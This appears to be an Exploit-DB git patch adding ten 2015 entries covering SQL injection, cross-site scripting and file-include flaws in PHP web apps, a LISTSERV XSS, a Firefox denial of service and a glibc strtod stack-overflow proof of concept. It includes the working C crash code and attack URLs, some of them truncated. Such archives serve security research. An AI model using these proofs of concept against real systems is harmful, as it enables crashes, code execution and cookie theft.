From 8762b868bfc5210f05d014ae53444c9ccbe1640d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 19 Jul 2015 05:01:52 +0000 Subject: [PATCH] DB: 2015-07-19 10 new exploits --- files.csv | 10 ++++++ platforms/cgi/webapps/37638.txt | 9 +++++ platforms/linux/local/37631.c | 28 ++++++++++++++++ platforms/multiple/dos/37639.html | 23 +++++++++++++ platforms/php/webapps/37630.txt | 11 ++++++ platforms/php/webapps/37632.txt | 9 +++++ platforms/php/webapps/37633.txt | 7 ++++ platforms/php/webapps/37634.txt | 14 ++++++++ platforms/php/webapps/37635.txt | 13 +++++++ platforms/php/webapps/37636.txt | 15 +++++++++ platforms/php/webapps/37637.pl | 56 +++++++++++++++++++++++++++++++ 11 files changed, 195 insertions(+) create mode 100755 platforms/cgi/webapps/37638.txt create mode 100755 platforms/linux/local/37631.c create mode 100755 platforms/multiple/dos/37639.html create mode 100755 platforms/php/webapps/37630.txt create mode 100755 platforms/php/webapps/37632.txt create mode 100755 platforms/php/webapps/37633.txt create mode 100755 platforms/php/webapps/37634.txt create mode 100755 platforms/php/webapps/37635.txt create mode 100755 platforms/php/webapps/37636.txt create mode 100755 platforms/php/webapps/37637.pl diff --git a/files.csv b/files.csv index e9d92dfe5..bc34a320b 100755 --- a/files.csv +++ b/files.csv @@ -33963,3 +33963,13 @@ id,file,description,date,author,platform,type,port 37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and RCE",2015-07-16,"Pierre Kim",hardware,webapps,0 37628,platforms/hardware/remote/37628.rb,"D-Link Cookie Command Execution",2015-07-17,metasploit,hardware,remote,0 37629,platforms/php/webapps/37629.txt,"WordPress BuddyPress Activity Plus Plugin 1.5 - CSRF Vulnerability",2015-07-17,"Tom Adams",php,webapps,80 +37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-09,"Yakir Wizman",php,webapps,0 +37631,platforms/linux/local/37631.c,"GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",linux,local,0 +37632,platforms/php/webapps/37632.txt,"Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities",2012-08-13,"Chris Cooper",php,webapps,0 +37633,platforms/php/webapps/37633.txt,"mIRC 'projects.php' Cross Site Scripting Vulnerability",2012-08-10,TayfunBasoglu,php,webapps,0 +37634,platforms/php/webapps/37634.txt,"MindTouch DekiWiki Multiple Remote and Local File Include Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 +37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Include Vulnerability",2012-08-10,L0n3ly-H34rT,php,webapps,0 +37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme SQL Injection and Cross Site Scripting Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 +37637,platforms/php/webapps/37637.pl,"Elastix 'graph.php' Local File Include Vulnerability",2012-08-17,cheki,php,webapps,0 +37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting Vulnerability",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 +37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service Vulnerability",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 diff --git a/platforms/cgi/webapps/37638.txt b/platforms/cgi/webapps/37638.txt new file mode 100755 index 000000000..603219f31 --- /dev/null +++ b/platforms/cgi/webapps/37638.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/55082/info + +LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +LISTSERV 16 is vulnerable; other versions may also be affected. + +http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL= \ No newline at end of file diff --git a/platforms/linux/local/37631.c b/platforms/linux/local/37631.c new file mode 100755 index 000000000..8bcc8aa96 --- /dev/null +++ b/platforms/linux/local/37631.c @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/54982/info + +GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. + +Local attackers can exploit these issues to run arbitrary code with privileges of the affected application. Failed exploit attempts can result in a denial-of-service condition. + +include +#include +#include + +#define EXPONENT "e-2147483649" +#define SIZE 214748364 +int +main (void) +{ + char *p = malloc (1 + SIZE + sizeof (EXPONENT)); + if (p == NULL) + { + perror ("malloc"); + exit (EXIT_FAILURE); + } + p[0] = '1'; + memset (p + 1, '0', SIZE); + memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT)); + double d = strtod (p, NULL); + printf ("%a\n", d); + exit (EXIT_SUCCESS); +} diff --git a/platforms/multiple/dos/37639.html b/platforms/multiple/dos/37639.html new file mode 100755 index 000000000..03709ce0f --- /dev/null +++ b/platforms/multiple/dos/37639.html @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/55091/info + +Mozilla Firefox is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users. + +Mozilla Firefox 14.01 is affected; prior versions may also be affected. + + + + + + + + diff --git a/platforms/php/webapps/37630.txt b/platforms/php/webapps/37630.txt new file mode 100755 index 000000000..c96158dd1 --- /dev/null +++ b/platforms/php/webapps/37630.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/54980/info + +Hotel Booking Portal is prone to multiple SQL-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Hotel Booking Portal 0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/hbportal/includes/languagebar.php?xss=";